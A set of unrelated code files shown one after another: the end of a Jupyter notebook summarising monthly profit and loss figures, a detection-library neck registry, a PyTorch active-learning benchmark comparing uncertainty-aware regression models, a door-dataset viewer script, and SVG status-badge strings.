"['Jan-2010', 'Feb-2010', 'Mar-2010', 'Apr-2010', 'May-2010', 'Jun-2010', 'Jul-2010', 'Aug-2010', 'Sep-2010', 'Oct-2010', 'Nov-2010', 'Dec-2010', 'Jan-2011', 'Feb-2011', 'Mar-2011', 'Apr-2011', 'May-2011', 'Jun-2011', 'Jul-2011', 'Aug-2011', 'Sep-2011', 'Oct-2011', 'Nov-2011', 'Dec-2011', 'Jan-2012', 'Feb-2012', 'Mar-2012', 'Apr-2012', 'May-2012', 'Jun-2012', 'Jul-2012', 'Aug-2012', 'Sep-2012', 'Oct-2012', 'Nov-2012', 'Dec-2012', 'Jan-2013', 'Feb-2013', 'Mar-2013', 'Apr-2013', 'May-2013', 'Jun-2013', 'Jul-2013', 'Aug-2013', 'Sep-2013', 'Oct-2013', 'Nov-2013', 'Dec-2013', 'Jan-2014', 'Feb-2014', 'Mar-2014', 'Apr-2014', 'May-2014', 'Jun-2014', 'Jul-2014', 'Aug-2014', 'Sep-2014', 'Oct-2014', 'Nov-2014', 'Dec-2014', 'Jan-2015', 'Feb-2015', 'Mar-2015', 'Apr-2015', 'May-2015', 'Jun-2015', 'Jul-2015', 'Aug-2015', 'Sep-2015', 'Oct-2015', 'Nov-2015', 'Dec-2015', 'Jan-2016', 'Feb-2016', 'Mar-2016', 'Apr-2016', 'May-2016', 'Jun-2016', 'Jul-2016', 'Aug-2016', 'Sep-2016', 'Oct-2016', 'Nov-2016', 'Dec-2016', 'Jan-2017', 'Feb-2017']\n",
"[867884.0, 984655.0, 322013.0, -69417.0, 310503.0, 522857.0, 1033096.0, 604885.0, -216386.0, 477532.0, 893810.0, -80353.0, 779806.0, -335203.0, 697845.0, 793163.0, 485070.0, 584122.0, 62729.0, 668179.0, 899906.0, 834719.0, 132003.0, 309978.0, -755566.0, 1170593.0, 252788.0, 1151518.0, 817256.0, 570757.0, 506702.0, -1022534.0, 475062.0, 779976.0, 144175.0, 542494.0, 359333.0, 321469.0, 67780.0, 471435.0, 565603.0, 872480.0, 789480.0, 999942.0, -1196225.0, 268997.0, -687986.0, 1150461.0, 682458.0, 617856.0, 824098.0, 581943.0, 132864.0, 448062.0, 689161.0, 800701.0, 1166643.0, 947333.0, 578668.0, 988505.0, 1139715.0, 1029471.0, 687533.0, -524626.0, 158620.0, 87795.0, 423389.0, 840723.0, 568529.0, 332067.0, 989499.0, 778237.0, 650000.0, -1100387.0, -174946.0, 757143.0, 445709.0, 712961.0, -1163797.0, 569899.0, 768450.0, 102685.0, 795914.0, 60988.0, 138230.0, 671099.0]\n"
]
}
],
"source": [
"# Check the lists \n",
"print(date_lst)\n",
"print(lose_prof_lst)\n"
]
},
{
"cell_type": "code",
"execution_count": 4,
"id": "0c3ae3a1-a958-4e6c-8467-ff1f77ac0ace",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[116771.0, -662642.0, -391430.0, 379920.0, 212354.0, 510239.0, -428211.0, -821271.0, 693918.0, 416278.0, -974163.0, 860159.0, -1115009.0, 1033048.0, 95318.0, -308093.0, 99052.0, -521393.0, 605450.0, 231727.0, -65187.0, -702716.0, 177975.0, -1065544.0, 1926159.0, -917805.0, 898730.0, -334262.0, -246499.0, -64055.0, -1529236.0, 1497596.0, 304914.0, -635801.0, 398319.0, -183161.0, -37864.0, -253689.0, 403655.0, 94168.0, 306877.0, -83000.0, 210462.0, -2196167.0, 1465222.0, -956983.0, 1838447.0, -468003.0, -64602.0, 206242.0, -242155.0, -449079.0, 315198.0, 241099.0, 111540.0, 365942.0, -219310.0, -368665.0, 409837.0, 151210.0, -110244.0, -341938.0, -1212159.0, 683246.0, -70825.0, 335594.0, 417334.0, -272194.0, -236462.0, 657432.0, -211262.0, -128237.0, -1750387.0, 925441.0, 932089.0, -311434.0, 267252.0, -1876758.0, 1733696.0, 198551.0, -665765.0, 693229.0, -734926.0, 77242.0, 532869.0]\n"
]
}
],
"source": [
"# Calculate change\n",
"# help from https://www.w3schools.com/python/python_lists_loop.asp\n",
"difference = []\n",
"i = 1\n",
"while i < len(lose_prof_lst):\n",
" diff = lose_prof_lst[i]-lose_prof_lst[i-1]\n",
" difference.append(diff)\n",
" i = i + 1\n",
"\n",
"# Check the lists \n",
"print(difference)\n"
]
},
{
"cell_type": "code",
"execution_count": 5,
"id": "006847b7-e753-4c7e-83b5-e747d6ca3090",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Feb-2012 $1,926,159.00\n"
]
}
],
"source": [
"# Calculate greatest increase\n",
"great_increase_index = difference.index(max(difference))\n",
"great_increase_month = date_lst[great_increase_index+1]\n",
"\n",
"# '${:,.2f}'.format(amount) formats value; source: https://stackoverflow.com/questions/21208376/converting-float-to-dollars-and-cents\n",
"great_increase = '${:,.2f}'.format(max(difference))\n",
"\n",
"# Checking values\n",
"print(great_increase_month, great_increase)"
]
},
{
"cell_type": "code",
"execution_count": 6,
"id": "246340e4-36b8-4f67-a931-2e5237da65ed",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Sep-2013 $-2,196,167.00\n"
]
}
],
"source": [
"# Calculate greatest decrease\n",
"great_decrease_index = difference.index(min(difference))\n",
"great_decrease_month = date_lst[great_decrease_index+1]\n",
"\n",
"# '${:,.2f}'.format(amount) formats value; source: https://stackoverflow.com/questions/21208376/converting-float-to-dollars-and-cents\n",
"great_decrease = '${:,.2f}'.format(min(difference))\n",
"\n",
"# Checking values\n",
"print(great_decrease_month, great_decrease)"
]
},
{
"cell_type": "code",
"execution_count": 7,
"id": "03ab3661-c08f-4b9b-82f4-d50d6294ba73",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Financial Analysis\n",
"--------------------------------\n",
"Total months: 86\n",
"Total: $38,382,578.00\n",
"Average Change: $-2,315.12\n",
"Greatest Increase in Profits: Feb-2012, $1,926,159.00\n",
"Greatest Decrease in Profits: Sep-2013, $-2,196,167.00\n"
]
}
],
"source": [
"# Analysis\n",
"# title \n",
"print(\"Financial Analysis\")\n",
"print(\"--------------------------------\") \n",
"\n",
"# Total months\n",
"total_mon = len(date_lst)\n",
"print(f\"Total months: {total_mon}\")\n",
"\n",
"# Total net profit\n",
"# '${:,.2f}'.format(amount) formats value; source: https://stackoverflow.com/questions/21208376/converting-float-to-dollars-and-cents\n",
"total = '${:,.2f}'.format(sum(lose_prof_lst)) \n",
"print(f\"Total: {total}\")\n",
"\n",
"# Average change\n",
"avg_change = round(sum(difference)/len(difference), 2)\n",
"format_avg = '${:,.2f}'.format(avg_change)\n",
"print(f\"Average Change: {format_avg}\")\n",
"\n",
"# Greatest increase in profits\n",
"print(f\"Greatest Increase in Profits: {great_increase_month}, {great_increase}\")\n",
"\n",
"# Greatest increase in profits\n",
"print(f\"Greatest Decrease in Profits: {great_decrease_month}, {great_decrease}\")"
]
},
{
"cell_type": "code",
"execution_count": 8,
"id": "5ad2eea6-fbca-47fe-bc2b-ba8244b957c3",
"metadata": {},
"outputs": [],
"source": [
"# Export Financial Analysis\n",
"# Specify the file to write to\n",
"output_path = os.path.join(\".\", \"financial_analysis.csv\")\n",
"\n",
"# Open the file using \"write\" mode. Specify the variable to hold the contents\n",
"with open(output_path, 'w', newline='') as csvfile:\n",
"\n",
" # Initialize csv.writer\n",
" csvwriter = csv.writer(csvfile, delimiter=',')\n",
" \n",
" # Write column headers\n",
" csvwriter.writerow(['Financial Analysis', ''])\n",
" \n",
" # Write the first row \n",
" csvwriter.writerow(['Total months: ', total_mon])\n",
"\n",
" # Write the second row\n",
" csvwriter.writerow(['Total:', total])\n",
" \n",
" # Write the third row\n",
" csvwriter.writerow(['Average Change:', format_avg])\n",
" \n",
" # Write the fourth row\n",
" csvwriter.writerow(['Greatest Increase in Profits:', great_increase_month, great_increase])\n",
" \n",
" # Write the fifth row\n",
" csvwriter.writerow(['reatest Decrease in Profits:', great_decrease_month, great_decrease])"
]
},
{
"cell_type": "code",
"execution_count": null,
"id": "55080fa9-c7dc-42d1-b751-b931f8c84e9e",
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.8.8"
}
},
"nbformat": 4,
"nbformat_minor": 5
}
|
from typing import List
from tkdet.utils.registry import Registry
from .base import Neck
from typing import Union
__all__ = [
"NECK_REGISTRY",
"build_neck",
"get_neck_list",
]
NECK_REGISTRY = Registry("NECK")
def build_neck(cfg, input_shape) -> Union[Neck, None]:
if not cfg.MODEL.NECK.ENABLE:
return None
neck = NECK_REGISTRY.get(cfg.MODEL.NECK.NAME)(cfg, input_shape)
assert isinstance(neck, Neck)
return neck
def get_neck_list() -> List[str]:
return list(NECK_REGISTRY.keys())
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 2 11:29:39 2019
@author: nsde
"""
#%%
import torch
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
import numpy as np
import argparse, math, os, time
from tqdm import tqdm
from itertools import chain
from utils import timer, batchify, normalize_y, normal_log_prob, RBF, \
Norm2, OneMinusX, PosLinear, Reciprocal, normal_log_prob_w_prior, t_likelihood
#%%
def argparser(parser=None):
if parser is None:
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
gs = parser.add_argument_group('General settings')
gs.add_argument('--model', type=str, default='john', help='model to use')
if 'dataset' not in parser.parse_args():
gs.add_argument('--dataset', type=str, default='boston', help='dataset to use')
gs.add_argument('--seed', type=int, default=1, help='random state of data-split')
gs.add_argument('--repeats', type=int, default=10, help='number of repeatitions')
gs.add_argument('--silent', type=bool, default=True, help='suppress warnings')
gs.add_argument('--cuda', type=bool, default=True, help='use cuda')
gs.add_argument('--sample_size', type=float, default=0.01, help='fraction of pool to add after each iteration')
gs.add_argument('--al_iters', type=int, default=10, help='number of AL iterations')
ms = parser.add_argument_group('Model specific settings')
ms.add_argument('--batch_size', type=int, default=512, help='batch size')
ms.add_argument('--shuffel', type=bool, default=True, help='shuffel data during training')
ms.add_argument('--lr', type=float, default=1e-4, help='learning rate')
ms.add_argument('--iters', type=int, default=1000, help='number of iterations')
ms.add_argument('--mcmc', type=int, default=100, help='number of mcmc samples')
ms.add_argument('--inducing', type=int, default=500, help='number of inducing points')
ms.add_argument('--n_clusters', type=int, default=500, help='number of cluster centers')
ms.add_argument('--n_models', type=int, default=5, help='number of ensemble')
# Parse and return
args = parser.parse_args()
return args
#%%
def gp(args, X, y, Xpool, ypool, Xtest, ytest):
if X.shape[0] > 2000: # do not run gp for large datasets
return np.nan, np.nan, np.nan, np.nan
import GPy
d = X.shape[1]
kernel = GPy.kern.RBF(d, ARD=True)
model = GPy.models.GPRegression(X, y.reshape(-1, 1), kernel, normalizer=True)
model.constrain_positive(' ') # ensure positive hyperparameters
model.optimize()
m, v = model.predict(Xpool)
y_pred, cov = model.predict(Xtest, full_cov=True)
cov += 1e-4*np.diag(np.ones(cov.shape[0]))
y_pred = y_pred.flatten()
log_px = -1/2*(np.linalg.slogdet(cov)[1] \
+ (ytest-y_pred).T.dot(np.linalg.inv(cov).dot(ytest-y_pred)) \
+ d*math.log(2*math.pi)) / Xtest.shape[0]
rmse = math.sqrt(((ytest-y_pred)**2).mean())
return log_px, rmse, m.flatten(), v.flatten()
#%%
def nn(args, X, y, Xpool, ypool, Xtest, ytest):
if args.dataset == 'protein' or args.dataset == 'year_prediction':
n_neurons = 100
else:
n_neurons = 50
y, y_mean, y_std = normalize_y(y)
mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, 1))
var = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, 1),
torch.nn.Softplus())
if torch.cuda.is_available() and args.cuda:
mean.cuda(); var.cuda();
device=torch.device('cuda')
else:
device=torch.device('cpu')
optimizer = torch.optim.Adam(chain(mean.parameters(),
var.parameters()), lr=args.lr)
it = 0
progressBar = tqdm(desc='Training nn', total=args.iters, unit='iter')
batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
while it < args.iters:
switch = 1.0 if it > args.iters/2 else 0.0
optimizer.zero_grad()
data, label = next(batches)
data = torch.tensor(data).to(torch.float32).to(device)
label = torch.tensor(label).to(torch.float32).to(device)
m, v = mean(data), var(data)
v = switch*v + (1-switch)*torch.tensor([0.02**2], device=device)
loss = normal_log_prob(label, m, v).sum()
(-loss).backward()
optimizer.step()
it+=1
progressBar.update()
progressBar.set_postfix({'loss': loss.item()})
progressBar.close()
with torch.no_grad():
data = torch.tensor(Xpool).to(torch.float32).to(device)
label = torch.tensor(ypool).to(torch.float32).to(device)
m, v = mean(data), var(data)
pool_m = m * y_std + y_mean
pool_v = v * y_std**2
data = torch.tensor(Xtest).to(torch.float32).to(device)
label = torch.tensor(ytest).to(torch.float32).to(device)
m, v = mean(data), var(data)
m = m * y_std + y_mean
v = v * y_std**2
test_log_px = normal_log_prob(label, m, v)
test_rmse = ((label - m.flatten())**2).mean().sqrt()
return test_log_px.mean().item(), \
test_rmse.item(), \
pool_m.cpu().flatten().numpy(), \
pool_v.cpu().flatten().numpy()
#%%
def mcdnn(args, X, y, Xpool, ypool, Xtest, ytest):
if args.dataset == 'protein' or args.dataset == 'year_prediction':
n_neurons = 100
else:
n_neurons = 50
# y, y_mean, y_std = normalize_y(y)
mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.Dropout(p=0.1),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, 1),
torch.nn.Dropout(p=0.1))
if torch.cuda.is_available() and args.cuda:
mean.cuda()
device=torch.device('cuda')
else:
device=torch.device('cpu')
optimizer = torch.optim.Adam(mean.parameters(), lr=args.lr)
it = 0
progressBar = tqdm(desc='Training nn', total=args.iters, unit='iter')
batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
while it < args.iters:
optimizer.zero_grad()
data, label = next(batches)
data = torch.tensor(data).to(torch.float32).to(device)
label = torch.tensor(label).to(torch.float32).to(device)
m = mean(data)
loss = (m - label).abs().pow(2.0).mean()
loss.backward()
optimizer.step()
it+=1
progressBar.update()
progressBar.set_postfix({'loss': loss.item()})
progressBar.close()
with torch.no_grad():
data = torch.tensor(Xpool).to(torch.float32).to(device)
label = torch.tensor(ypool).to(torch.float32).to(device)
samples = torch.zeros(Xpool.shape[0], args.mcmc).to(device)
for i in range(args.mcmc):
samples[:,i] = mean(data).flatten()
pool_m, pool_v = samples.mean(dim=1), samples.var(dim=1)
# pool_m = m * y_std + y_mean
# pool_v = v * y_std**2
data = torch.tensor(Xpool).to(torch.float32).to(device)
label = torch.tensor(ypool).to(torch.float32).to(device)
samples = torch.zeros(Xpool.shape[0], args.mcmc).to(device)
for i in range(args.mcmc):
samples[:,i] = mean(data).flatten()
m, v = samples.mean(dim=1), samples.var(dim=1)
#m = m * y_std + y_mean
#v = v * y_std**2
test_log_px = normal_log_prob(label, m, v)
test_rmse = ((label - m.flatten())**2).mean().sqrt()
return test_log_px.mean().item(), \
test_rmse.item(), \
pool_m.cpu().flatten().numpy(), \
pool_v.cpu().flatten().numpy()
#%%
def ensnn(args, X, y, Xpool, ypool, Xtest, ytest):
if args.dataset == 'protein' or args.dataset == 'year_prediction':
n_neurons = 100
else:
n_neurons = 50
y, y_mean, y_std = normalize_y(y)
ms_pool, vs_pool, ms, vs = [ ], [ ], [ ], [ ]
for m in range(args.n_models): # initialize differently
mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, 1))
var = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, 1),
torch.nn.Softplus())
if torch.cuda.is_available() and args.cuda:
mean.cuda(); var.cuda();
device=torch.device('cuda')
else:
device=torch.device('cpu')
optimizer = torch.optim.Adam(chain(mean.parameters(),
var.parameters()), lr=args.lr)
it = 0
progressBar = tqdm(desc='Training nn', total=args.iters, unit='iter')
batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
while it < args.iters:
switch = 1.0 if it > args.iters/2 else 0.0
optimizer.zero_grad()
data, label = next(batches)
data = torch.tensor(data).to(torch.float32).to(device)
label = torch.tensor(label).to(torch.float32).to(device)
m, v = mean(data), var(data)
v = switch*v + (1-switch)*torch.tensor([0.02**2], device=device)
loss = normal_log_prob(label, m, v).sum()
(-loss).backward()
optimizer.step()
it+=1
progressBar.update()
progressBar.set_postfix({'loss': loss.item()})
progressBar.close()
with torch.no_grad():
data = torch.tensor(Xpool).to(torch.float32).to(device)
label = torch.tensor(ypool).to(torch.float32).to(device)
m, v = mean(data), var(data)
pool_m = m * y_std + y_mean
pool_v = v * y_std**2
data = torch.tensor(Xtest).to(torch.float32).to(device)
label = torch.tensor(ytest).to(torch.float32).to(device)
m, v = mean(data), var(data)
m = m * y_std + y_mean
v = v * y_std**2
ms_pool.append(pool_m)
vs_pool.append(pool_v)
ms.append(m)
vs.append(v)
ms_pool = torch.stack(ms_pool)
vs_pool = torch.stack(vs_pool)
ms = torch.stack(ms)
vs = torch.stack(vs)
pool_m = ms_pool.mean(dim=0)
pool_v = (vs_pool + ms_pool**2).mean(dim=0) - pool_m**2
m = ms.mean(dim=0)
v = (vs + ms**2).mean(dim=0) - m**2
test_log_px = normal_log_prob(label, m, v)
test_rmse = ((label - m.flatten())**2).mean().sqrt()
return test_log_px.mean().item(), \
test_rmse.item(), \
pool_m.cpu().flatten().numpy(), \
pool_v.cpu().flatten().numpy()
#%%
def john(args, X, y, Xpool, ypool, Xtest, ytest):
from sklearn.cluster import KMeans
from utils import dist
from itertools import chain
from torch import distributions as D
from locality_sampler import gen_Qw, locality_sampler2
if args.dataset == 'protein' or args.dataset == 'year_prediction':
n_neurons = 100
else:
n_neurons = 50
args.n_clusters = min(args.n_clusters, X.shape[0])
y, y_mean, y_std = normalize_y(y)
mean_psu = 1
mean_ssu = 50
mean_M = 60
var_psu = 2
var_ssu = 10
var_M = 15
num_draws_train = 20
kmeans = KMeans(n_clusters=args.n_clusters)
if args.dataset != 'year_prediction':
kmeans.fit(np.concatenate([X], axis=0))
else:
kmeans.fit(X[np.random.randint(0, X.shape[0], size=(10000))])
c = torch.tensor(kmeans.cluster_centers_, dtype=torch.float32)
if torch.cuda.is_available() and args.cuda:
c = torch.tensor(c).to(torch.float32).to('cuda')
else:
c = torch.tensor(c).to(torch.float32)
class translatedSigmoid(torch.nn.Module):
def __init__(self):
super(translatedSigmoid, self).__init__()
self.beta = torch.nn.Parameter(torch.tensor([1.5]))
def forward(self, x):
beta = torch.nn.functional.softplus(self.beta)
alpha = -beta*(6.9077542789816375)
return torch.sigmoid((x+alpha)/beta)
class GPNNModel(torch.nn.Module):
def __init__(self):
super(GPNNModel, self).__init__()
self.mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, y.shape[1]))
self.alph = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, y.shape[1]),
torch.nn.Softplus())
self.bet = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
torch.nn.ReLU(),
torch.nn.Linear(n_neurons, y.shape[1]),
torch.nn.Softplus())
self.trans = translatedSigmoid()
def forward(self, x, switch):
d = dist(x, c)
d_min = d.min(dim=1, keepdim=True)[0]
s = self.trans(d_min)
mean = self.mean(x)
if switch:
a = self.alph(x)
b = self.bet(x)
gamma_dist = D.Gamma(a+1e-8, 1.0/(b+1e-8))
if self.training:
samples_var = gamma_dist.rsample(torch.Size([num_draws_train]))
x_var = (1.0/(samples_var+1e-8))
else:
samples_var = gamma_dist.rsample(torch.Size([1000]))
x_var = (1.0/(samples_var+1e-8))
# var = (1-s) * x_var + s*torch.tensor([y_std**2], device=x.device) # HYPERPARAMETER
var = (1-s) * x_var + s * y_std ** 2
else:
var = 0.05*torch.ones_like(mean)
return mean, var
model = GPNNModel()
if torch.cuda.is_available() and args.cuda:
model.cuda()
device=torch.device('cuda')
else:
device=torch.device('cpu')
optimizer = torch.optim.Adam(model.mean.parameters(), lr=1e-2)
optimizer2 = torch.optim.Adam(chain(model.alph.parameters(),
model.bet.parameters(),
model.trans.parameters()), lr=1e-4)
mean_Q, mean_w = gen_Qw(X, mean_psu, mean_ssu, mean_M)
var_Q, var_w = gen_Qw(X, var_psu, var_ssu, var_M)
#mean_pseupoch = get_pseupoch(mean_w,0.5)
#var_pseupoch = get_pseupoch(var_w,0.5)
opt_switch = 1
mean_w = torch.Tensor(mean_w).to(device)
var_w = torch.Tensor(var_w).to(device)
model.train()
X = torch.tensor(X).to(torch.float32).to(device)
y = torch.tensor(y).to(torch.float32).to(device)
batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
# validation data and performance measures
ll_list = []
mae_list = []
rmse_list = []
x_eval = torch.tensor(Xtest).to(torch.float32).to(device)
y_eval = torch.tensor(ytest).to(torch.float32).to(device)
x_pool = torch.tensor(Xpool).to(torch.float32).to(device)
# y_pool = torch.tensor(ypool).to(torch.float32).to(device)
y_mean = torch.tensor(y_mean).to(torch.float32).to(device)
y_std = torch.tensor(y_std).to(torch.float32).to(device)
it = 0
its_per_epoch = int(np.ceil(X.shape[0] / args.batch_size))
epochs = round(args.iters / its_per_epoch)
while it < args.iters:
switch = 1.0 if it > args.iters/2.0 else 0.0
if it % 11: opt_switch = opt_switch + 1 # change between var and mean optimizer
data, label = next(batches)
if not switch:
optimizer.zero_grad();
m, v = model(data, switch)
loss = -t_likelihood(label.reshape(-1,1), m.reshape(-1,1), v.reshape(1,-1,1)) / X.shape[0]
loss.backward()
optimizer.step()
else:
if opt_switch % 2 == 0:
#for b in range(mean_pseupoch):
optimizer.zero_grad()
batch = locality_sampler2(mean_psu,mean_ssu,mean_Q,mean_w)
m, v = model(X[batch], switch)
loss = -t_likelihood(y[batch].reshape(-1, 1), m.reshape(-1, 1), v.reshape(v.shape[0], -1, 1),
mean_w[batch].repeat(y.shape[1])) / X.shape[0]
loss.backward()
optimizer.step()
else:
#for b in range(var_pseupoch):
optimizer2.zero_grad()
batch = locality_sampler2(var_psu,var_ssu,var_Q,var_w)
m, v = model(X[batch], switch)
loss = -t_likelihood(y[batch].reshape(-1, 1), m.reshape(-1, 1), v.reshape(v.shape[0], -1, 1),
var_w[batch].repeat(y.shape[1])) / X.shape[0]
loss.backward()
optimizer2.step()
# if it % 500 == 0:
# m, v = model(data, switch)
# loss = -(-v.log()/2 - ((m.flatten()-label)**2).reshape(1,-1,1) / (2 * v)).mean()
# print('Iter {0}/{1}, Loss {2}'.format(it, args.iters, loss.item()))
# test on validation set once per epoch
if it % its_per_epoch == 0:
model.eval()
with torch.no_grad():
m, v = model(x_eval, switch)
m = m * y_std + y_mean
v = v * y_std ** 2
if switch == 0:
ll = t_likelihood(y_eval, m, v.unsqueeze(0)).item()
else:
ll = t_likelihood(y_eval, m, v).item()
# if it % (500 * its_per_epoch) == 0:
# print('Epoch {:d}/{:d},'.format(it // its_per_epoch, epochs), 'Loss {:.4f},'.format(ll))
# log validation performance after we are stable in the second optimization regime
if it > args.iters * 0.60:
ll_list.append(ll)
error = torch.norm(y_eval - m, p=2, dim=1)
mae_list.append(error.abs().mean().item())
rmse_list.append((error ** 2).mean().sqrt().item())
model.train()
# early stop check
if len(ll_list) - np.argmax(ll_list) > 50:
it = args.iters
print('Early Stop!')
it+=1
# get best LL
i_best = np.argmax(ll_list)
# evaluate model moments
with torch.no_grad():
model.training = False
m_test, v_test = model(x_eval, 1.0)
m_test = m_test * y_std + y_mean
v_test = v_test * y_std ** 2
m_pool, v_pool = model(x_pool, 1.0)
m_pool = m_pool * y_std + y_mean
v_pool = v_pool * y_std ** 2
return ll_list[i_best], rmse_list[i_best], m_test.cpu().numpy(), v_test.cpu().numpy(), m_pool.cpu().numpy(), v_pool.cpu().numpy()
def detlefsen_uci_baseline(x_train, y_train, x_pool, y_pool, x_test, y_test, iterations, batch_size, parser=None):
# get default input arguments
args = argparser(parser)
# set passed in arguments
args.iters = iterations
args.batch_size = batch_size
# train model and get its mean and std estimates on the evaluation points
ll, rmsl2, m_test, v_test, m_pool, v_pool = john(args, x_train, y_train, x_pool, y_pool, x_test, y_test)
return ll, rmsl2, m_test, v_test, m_pool, v_pool
#%%
if __name__ == '__main__':
args = argparser() # get input arguments
if args.silent:
import warnings
warnings.filterwarnings("ignore")
print("==================== Training model {0} on dataset {1} ====================".format(
args.model, args.dataset))
# Load data
dataset = np.load('data/regression_datasets/' + args.dataset + '.npz')
X, y = dataset['data'], dataset['target']
log_score, rmse_score = [ ], [ ]
# Train multiple models
T = timer()
for i in range(args.repeats):
print("==================== Model {0}/{1} ====================".format(i+1, args.repeats))
time.sleep(0.5)
# Make train/pool/test split
Xtrain, Xtest, ytrain, ytest = train_test_split(X, y,
test_size=0.2,
random_state=(i+1)*args.seed)
Xtrain, Xpool, ytrain, ypool = train_test_split(Xtrain, ytrain,
test_size=0.75,
random_state=(i+1)*args.seed)
T.begin()
log_score.append([ ]); rmse_score.append([ ])
args.sample_size = int(Xpool.shape[0] * args.sample_size)
al_iters = int(np.minimum(np.ceil(Xpool.shape[0]/args.sample_size), args.al_iters))
# Active learning time
for j in range(al_iters):
print("======== AL iter {0}/{1} ========".format(j+1, al_iters))
time.sleep(0.5)
# Normalize data
scaler = preprocessing.StandardScaler()
scaler.fit(Xtrain)
Xtrain = scaler.transform(Xtrain)
Xpool = scaler.transform(Xpool)
Xtest = scaler.transform(Xtest)
# Fit and score model
logpx, rmse, m, v = eval(args.model)(args, Xtrain, ytrain, Xpool, ypool, Xtest, ytest)
# Select point 10 points with highest variance = most uncertain about
idx = np.argsort(v)[::-1][:args.sample_size]
# Add to train, remove from test
Xtrain = np.concatenate((Xtrain, Xpool[idx]), axis=0)
ytrain = np.concatenate((ytrain, ypool[idx]), axis=0)
Xpool = np.delete(Xpool, (idx), axis=0)
ypool = np.delete(ypool, (idx), axis=0)
log_score[-1].append(logpx)
rmse_score[-1].append(rmse)
T.end()
log_score = np.array(log_score)
rmse_score = np.array(rmse_score)
# Save results
if not 'results/active_learning_results' in os.listdir():
os.makedirs('results/active_learning_results/', exist_ok=True)
np.savez('results/active_learning_results/' + args.dataset + '_' + args.model,
log_score=log_score,
rmse_score=rmse_score,
timings=np.array(T.timings))
# Print the results
T.res() |
import cv2
import numpy as np
from generic_dataset.dataset_folder_manager import DatasetFolderManager
from generic_dataset.utilities.color import Color
from generic_dataset.dataset_manager import DatasetManager
from gibson_env_utilities.doors_dataset.door_sample import DoorSample
dataset_path ='/home/michele/myfiles/doors_dataset'
# Create the DatasetFolderManager instance and read sample
folder_manager = DatasetFolderManager(dataset_path=dataset_path, folder_name='house1', sample_class=DoorSample)
# Load a sample (positive, label = 1)
sample: DoorSample = folder_manager.load_sample_using_relative_count(label=1, relative_count=0, use_thread=False)
sample.set_pretty_semantic_image(sample.get_semantic_image().copy())
sample.pipeline_depth_data_to_image().run(use_gpu=False).get_data()
sample.create_pretty_semantic_image(color=Color(red=0, green=255, blue=0))
display_image_0 = np.concatenate((sample.get_bgr_image(), cv2.cvtColor(sample.get_depth_image(), cv2.COLOR_GRAY2BGR)), axis=1)
display_image_1 = np.concatenate((sample.get_semantic_image(), sample.get_pretty_semantic_image()), axis=1)
cv2.imshow('sample', np.concatenate((display_image_0, display_image_1), axis=0))
cv2.waitKey()
# Create DatasetManager instance and display dataset information
dataset = DatasetManager(dataset_path=dataset_path, sample_class=DoorSample)
# Save the folders' metadata to disk
dataset.save_metadata()
print('The total amount of examples are')
for label, count in dataset.get_sample_count().items():
print(' - {0} -> {1} samples'.format(label, count)) |
SERVICE_OK = """
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="72" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="72" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h49v20H0z"/><path fill="#4c1" d="M49 0h23v20H49z"/><path fill="url(#b)" d="M0 0h72v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="255" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="390">service</text><text x="255" y="140" transform="scale(.1)" textLength="390">service</text><text x="595" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="130">ok</text><text x="595" y="140" transform="scale(.1)" textLength="130">ok</text></g> </svg>
"""
SERVICE_ERROR = """
